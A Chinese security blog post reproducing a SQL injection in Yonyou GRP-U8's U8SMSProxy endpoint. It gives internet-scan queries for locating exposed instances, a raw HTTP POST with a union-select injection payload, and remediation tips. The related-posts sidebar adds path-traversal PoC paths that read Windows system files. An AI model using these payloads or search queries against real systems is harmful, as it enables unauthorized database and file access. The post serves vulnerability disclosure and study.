【漏洞复现】用友 GRP-U8 U8SMSProxy SQL注入漏洞

于 2024-07-19 00:17:40 发布
阅读量114 收藏 2
点赞数 3
分类专栏: 漏洞复现 文章标签: sql 数据库 web web渗透 web安全 漏洞 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41924764/article/details/140238599
版权

免责声明:

        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。

产品简介

用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。

漏洞描述

用友 GRP-U8 U8SMSProxy 存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限

网络空间测绘

Fofa

product="用友-GRP-U8"

Hunter

web.icon=="b41be1ccc6f9f2894e0cfcf23acf5fc0

Quake

app: "用友GRP-U8"

image.png

漏洞复现

POST /U8SMSProxy?class=XXNote&id=qryyfs HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Connection: close

begindate='union select 6/3--&enddate=2020-10-27&search=

image.png

修复建议

1、如⾮必要,禁⽌公⽹访问该系统。
2、通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。
3、升级产品到最新版本

凝聚力安全团队
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
用友GRP-U8 SelectDMJE.jsp SQL注入漏洞复现
0xSec
01-18 516
用友GRP-U8R10行政事业内控管理软件SelectDMJE.jsp接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
用友GRP-U8 sqcxIndex.jsp SQL注入致RCE漏洞复现(XVE-2024-12560)
0xSec
05-27 495
用友GRP-U8R10行政事业内控管理软件sqcxIndex.jsp 接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。
用友GRP-U8 u8qx 存在SQL注入漏洞
weixin_43167326的博客
05-28 1315
用友GRP-U8R10行政事业内控管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。用友GRP-U8 sqcxIndex 接口处存在SQL注入漏洞 ,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
用友GRP-U8 SQL注入漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
09-26 1662
用友GRP-U8 SQL注入漏洞复现
漏洞复现用友 GRP-U8 Proxy SQL注入
最新发布
凝聚力安全团队
07-07 262
用友GRP-U8是一款功能全面、灵活度高、可定制性强的ERP软件,能够协助企业实现资源的高效管理,优化企业运营流程,提升整体管理水平。用友 GRP-U8 Proxy 存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限
用友GRP-U8R10政务管理软件AO数据采集方法.pdf
11-04
通过用友GRP-U8(R10)提供的后台数据管理工具,生成SQL数据库备份数据(.bat文件)。 2. SQL2008R2还原备份数据 打开 SQL Server Management Studio,右键点击数据库-> 点击“ 还原数据库“-> 选择“ 设备源”-> ...
用友Grp-U8明细账打印补丁publish.rar
10-09
本软件针对GRP-U8v10.5政务软件(政府会计制度)开发的明细账一次性打印补丁。 开发环境:SQL2008R2(低版本数据尽量能升级后再使用本补丁)。 Grp-U8(B/C/G)补丁2019-12-31. 安装手册:本补丁为绿色版,注册...
用友GRP-U8 R10政务管理软件 AO数据采集方法.doc
11-14
1. 获取财务软件SQL数据库备份:通过用友GRP-U8 R10的后台数据管理工具生成SQL数据库的.bat备份文件,这是整个过程的基础。 2. SQL2008R2还原备份数据:使用SQL Server Management Studio,选择“还原数据库”功能...
用友政务GRP_U8行政事业版 SQLserver数据库版鼎信诺审计取数说明:.docx
01-24
本文档主要介绍了用友GRP_U8行政事业版 SQLserver数据库版鼎信诺审计取数的操作步骤和说明。下面是详细的知识点总结: 一、选择版本 在选择版本时,需要选择“用友安易 R97 新系列”,然后选择 SQL Server 数据库...
用友GRP-U8R10政务管理软件AO数据采集方法分享.pdf
01-01
- **步骤一**:使用用友GRP-U8 R10的后台数据管理工具生成SQL数据库备份(.bat文件)。 - **步骤二**:在SQL Server Management Studio中,通过“还原数据库”功能,将备份的SQL数据库恢复到SQL2008R2环境中。 - ...
MS17-010(永恒之蓝) 漏洞检测及利用教程
凝聚力安全团队
11-13 5982
漏洞描述: 攻击者向 Microsoft 服务器消息块SMB服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行。 影响版本: - Windows Vista - Windows 7 - Windows 8.1 - Windows RT 8.1 - Windows 10 - Windows Server 2008 和 Windows Server 2008 R2 - Windows Server 2012 和 Windows Server 201
CVE-2020-1938 Apache-Tomcat-Ajp (幽灵猫)文件包含漏洞复现
凝聚力安全团队
11-15 4473
目录漏洞描述影响版本漏洞环境搭建漏洞利用任意文件读取本地包含命令执行,测试ping dnslog反弹shell漏洞加固参考文章 漏洞描述   该漏洞使攻击者可以读取任何webapps文件(例如webapp配置文件,源代码等)或包括一个文件来远程执行代码。由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。 影响版本 Apache Tomcat 6 Apache Tomcat 7 &lt
CVE-2012-2122 Mysql身份认证漏洞及利用
凝聚力安全团队
01-25 4170
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞检测msf漏洞利用漏洞加固建议参考链接 漏洞描述   当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。 影响版本 MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
CVE-2018-12613 PHPmyadmin文件包含漏洞分析及漏洞利用
凝聚力安全团队
11-20 4062
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞利用漏洞加固 漏洞描述    影响版本 漏洞环境搭建 漏洞分析 漏洞利用 漏洞加固
CVE-2017-7529 Nginx越界读取缓存漏洞
凝聚力安全团队
01-26 4018
目录漏洞描述影响版本漏洞环境搭建漏洞原理漏洞利用漏洞加固参考链接 漏洞描述   从0.5.6到1.13.2(含)的Nginx版本容易受到nginx范围过滤器模块中整数溢出漏洞的攻击,从而导致特制请求触发的潜在敏感信息泄漏。 影响版本 Nginx 0.5.6 – 1.13.2 漏洞环境搭建 使用docker 启动vulhub中的CVE-2017-7529环境 docker快速入门以及漏洞环境搭建 漏洞原理 Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,
DS_Store文件泄露
凝聚力安全团队
11-02 3458
这里写目录标题 利用工具: https://github.com/lijiejie/ds_store_exp python ds_store_exp.py http://www.example.com/.DS_Store
CVE-2020-0796 漏洞利用教程
凝聚力安全团队
10-30 3050
目录漏洞描述影响版本漏洞检测漏洞利用蓝屏攻击远程代码执行本地提权修复建议 漏洞描述   Microsoft服务器消息块3.1.1(SMBv3)协议处理某些请求的方式中存在一个远程执行代码漏洞,也称为“ Windows SMBv3客户端/服务器远程执行代码漏洞”。 影响版本 适用于32位系统的Windows 10版本1903 Windows 10 1903版(用于基于ARM64的系统) Windows 10 1903版(用于基于x64的系统) 适用于32位系统的Windows 10版本1909 Windo
CVE-2020-11107 XAMPP 任意命令执行漏洞复现(用户提权)
凝聚力安全团队
11-13 2346
目录漏洞描述漏洞影响漏洞检测漏洞利用修复建议参考链接 漏洞描述 漏洞影响 Apache Friends XAMPP <7.2.29 Apache Friends XAMPP 7.3.,<7.3.16 Apache Friends XAMPP 7.4.,<7.4.4 漏洞检测 漏洞利用 修复建议 参考链接 ...
(CVE-2019-14322)Pallets Werkzeug 0.15.4 路径遍历漏洞
凝聚力安全团队
08-03 2340
漏洞描述 在0.15.5之前的Pallets Werkzeug中,shareddatmiddleware错误处理了Windows路径名中的驱动器名。 漏洞影响 小于 Werkzeug 0.15.5 FOFA title=“Odoo” 漏洞复现 Poc: /base/static/c:/windows/win.ini /base_import/static/c:/windows/win.ini /web/static/c:/windows/win.ini ...
用友GRP-U8高校内控管理软件 漏洞
07-28
引用\[1\]: 用友GRP-U8R10行政事业财务管理软件存在任意文件上传漏洞,攻击者可以通过该漏洞获取服务器权限。\[1\]该漏洞源于应用程序解析XML输入时没有禁止外部实体的加载,导致可加载恶意外部文件。最终产生两种后果,一是可以进行SQL注入,执行SQL语句;二是导致命令执行,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。\[3\]因此,用友GRP-U8高校内控管理软件也可能存在类似的漏洞。请及时更新软件版本或采取其他安全措施以防止潜在的攻击。 #### 引用[.reference_title] - *1* [用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用](https://blog.csdn.net/qq_41904294/article/details/129693405)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [用友 GRP-U8 Proxy XXE-SQL注入漏洞](https://blog.csdn.net/weixin_46944519/article/details/127225867)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凝聚力安全团队

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值